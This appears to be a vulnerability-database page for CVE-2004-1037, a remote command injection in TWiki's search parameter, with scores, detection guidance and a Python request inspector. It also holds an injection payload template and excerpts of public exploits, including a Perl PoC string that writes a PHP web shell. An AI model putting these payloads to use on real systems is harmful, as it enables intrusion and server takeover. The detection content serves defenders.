CVE-2004-1037
Published 2005-03-01
CVE-2004-1037: The search function in TWiki 20030201 allows remote attackers to execute arbitrary commands via shell metacharacters in a search string.
Priority P2 · 61 · critical · 10 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 61.67% (99.1th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| twiki | twiki | — | — |
Detection & IOCs (extracted from sources)
command: `scope=text&order=modified&search=nonexistantttt\' ; (<COMMAND>) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt`
- Detect shell metacharacter injection in the 'search' HTTP parameter sent to TWiki's search/WebSearch CGI endpoint. Look for characters such as single quotes, semicolons, backticks, and pipe symbols in the search parameter value.
- Monitor HTTP GET and POST requests to paths matching /cgi-bin/twiki/search/ or /twiki/bin/view/Main/WebSearch with a 'search' parameter containing shell injection patterns (e.g., ${IFS}, semicolons, single quotes followed by shell commands).
- Alert on HTTP requests to TWiki search endpoints where the search parameter contains the pattern: single-quote followed by semicolon and shell command tokens, characteristic of the pre/post string injection wrapper used by the public PoC exploit.
- Detect use of ${IFS} shell variable substitution in HTTP query parameters targeting TWiki, as used by the Metasploit module to bypass space-character filtering in the search parameter.
- Flag requests with User-Agent 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)' combined with shell metacharacters in the search parameter, as this is the default UA hardcoded in the public PoC exploit tool 'tweaky.pl'.
- Affected TWiki versions to target for patching/detection scope: 20040901, 20030201, 20011201, 20001201, and SVN revisions up to and including 3224.
- The Metasploit module targets the '/view/Main/WebSearch' endpoint under the configured URI base, while the standalone PoC (tweaky.pl) defaults to '/cgi-bin/twiki/search/Main/'. Defenders should monitor both path patterns as TWiki installations may vary.
- The exploit supports both GET and POST HTTP methods for delivering the malicious search parameter; detection rules must cover both request methods.
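The checks listed above, combined into one request inspector, as an added example (not code from this page or from any of the cited sources). The function names, reason labels and sample requests are constructed for illustration, `COMMAND` and `ARG` are placeholders, and the path patterns assume the two layouts named above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint fragments named on this page (standalone PoC default and Metasploit target).
TWIKI_PATHS = re.compile(r"/search/|/view/Main/WebSearch", re.I)
# User-Agent the page reports as hardcoded in the public PoC.
POC_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
METACHARS = re.compile(r"['`;|]")      # quote, backtick, semicolon, pipe
QUOTE_BREAKOUT = re.compile(r"'\s*;")  # single quote followed by semicolon
IFS = re.compile(r"\$\{IFS\}")         # space-filter bypass token

def search_values(method, url, body=""):
    """Return the path and every URL-decoded 'search' value (query string, plus form body on POST)."""
    parts = urlsplit(url)
    values = parse_qs(parts.query, keep_blank_values=True, separator="&").get("search", [])
    if method.upper() == "POST":
        values += parse_qs(body, keep_blank_values=True, separator="&").get("search", [])
    return parts.path, values

def inspect_request(method, url, body="", user_agent=""):
    """Return a sorted list of reasons this request matches the CVE-2004-1037 indicators."""
    path, values = search_values(method, url, body)
    if not TWIKI_PATHS.search(path):
        return []
    reasons = set()
    for value in values:
        if METACHARS.search(value):
            reasons.add("metachar")
        if QUOTE_BREAKOUT.search(value):
            reasons.add("quote-breakout")
        if IFS.search(value):
            reasons.add("ifs")
    # The User-Agent alone is weak evidence; count it only alongside a payload hit.
    if reasons and user_agent == POC_UA:
        reasons.add("poc-user-agent")
    return sorted(reasons)

# Constructed sample requests: (method, url, body, user_agent).
SAMPLES = [
    ("GET", "/cgi-bin/twiki/search/Main/?scope=text&order=modified"
            "&search=x%27%20%3B%20(COMMAND)%20%7C%20PLACEHOLDER", "", POC_UA),
    ("POST", "/twiki/bin/view/Main/WebSearch",
             "search=x%27%3BCOMMAND%24%7BIFS%7DARG", "ExampleBrowser/1.0"),
    ("GET", "/twiki/bin/view/Main/WebSearch?search=release+notes", "", POC_UA),
    ("GET", "/shop/find?search=x%27%3BCOMMAND", "", "ExampleBrowser/1.0"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[0], sample[1][:40], inspect_request(*sample))
```

A lone single quote in a search term also yields `metachar`, so that label is better treated as a low-confidence signal and alerts reserved for `quote-breakout` or `ifs`.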
No detection rules found.
Exploit-DB
TWiki - Search Function Arbitrary Command Execution (Metasploit)
exploitdb·2010-07-03
---
##
# $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TWiki Search Function Arbitrary Command Execution',
'Description' => %q{
This module exploits a vulnerability in the search component of TWiki.
By passing a 'search' parameter containing shell metacharacters to the
'WebSearch' script, an attacker can execute arbitrary OS commands.
},
'Author' =>
[
# Unknown - original discovery
'jduck' # metasploit version
],
'Licens
Exploit-DB
TWiki 20030201 - 'search.pm' Remote Command Execution
exploitdb·2004-11-20
---
#!/usr/bin/perl
# "tweaky.pl" v. 1.0 beta 2
#
# Proof of concept for TWiki vulnerability. Remote code execution
# Vuln discovered, researched and exploited by RoMaNSoFt
#
# Madrid, 30.Sep.2004.
require LWP::UserAgent;
use Getopt::Long;
### Default config
$host = '';
$path = '/cgi-bin/twiki/search/Main/';
$secure = 0;
$get = 0;
$post = 0;
$phpshellpath='';
$createphpshell = '(echo `perl -e \'print chr(60).chr(63)\'` ; echo \'$out = shell_exec($_GET["cmd"].
" 2\'`perl -e \'print chr(62).chr(38)\'`\'1");\' ; echo \'echo "\'`perl -e \'print chr(60)."pre".chr(62)."\\\\
$out".chr(60)."/pre".chr(62)\'`\'";\' ; echo `perl -e \'print chr(63).chr(62)\'`) | tee ';
$logfile = ''; # If empty, logging will be disabled
$prompt = "tweaky\$ ";
Metasploit
TWiki Search Function Arbitrary Command Execution
metasploit
This module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to a 'Search' script, an attacker can execute arbitrary OS commands.
Affected versions:
- 20040901
- 20030201
- 20011201
- 20001201
- SVN up to and including revision 3224
No writeups or analysis indexed.
- http://archives.neohapsis.com/archives/bugtraq/2004-11/0201.html
- http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000918
- http://marc.info/?l=bugtraq&m=110037207516456&w=2
- http://security.gentoo.org/glsa/glsa-200411-33.xml
- http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
- http://www.ciac.org/ciac/bulletins/p-039.shtml
- http://www.securityfocus.com/bid/11674
- https://exchange.xforce.ibmcloud.com/vulnerabilities/18062
Published: 2005-03-01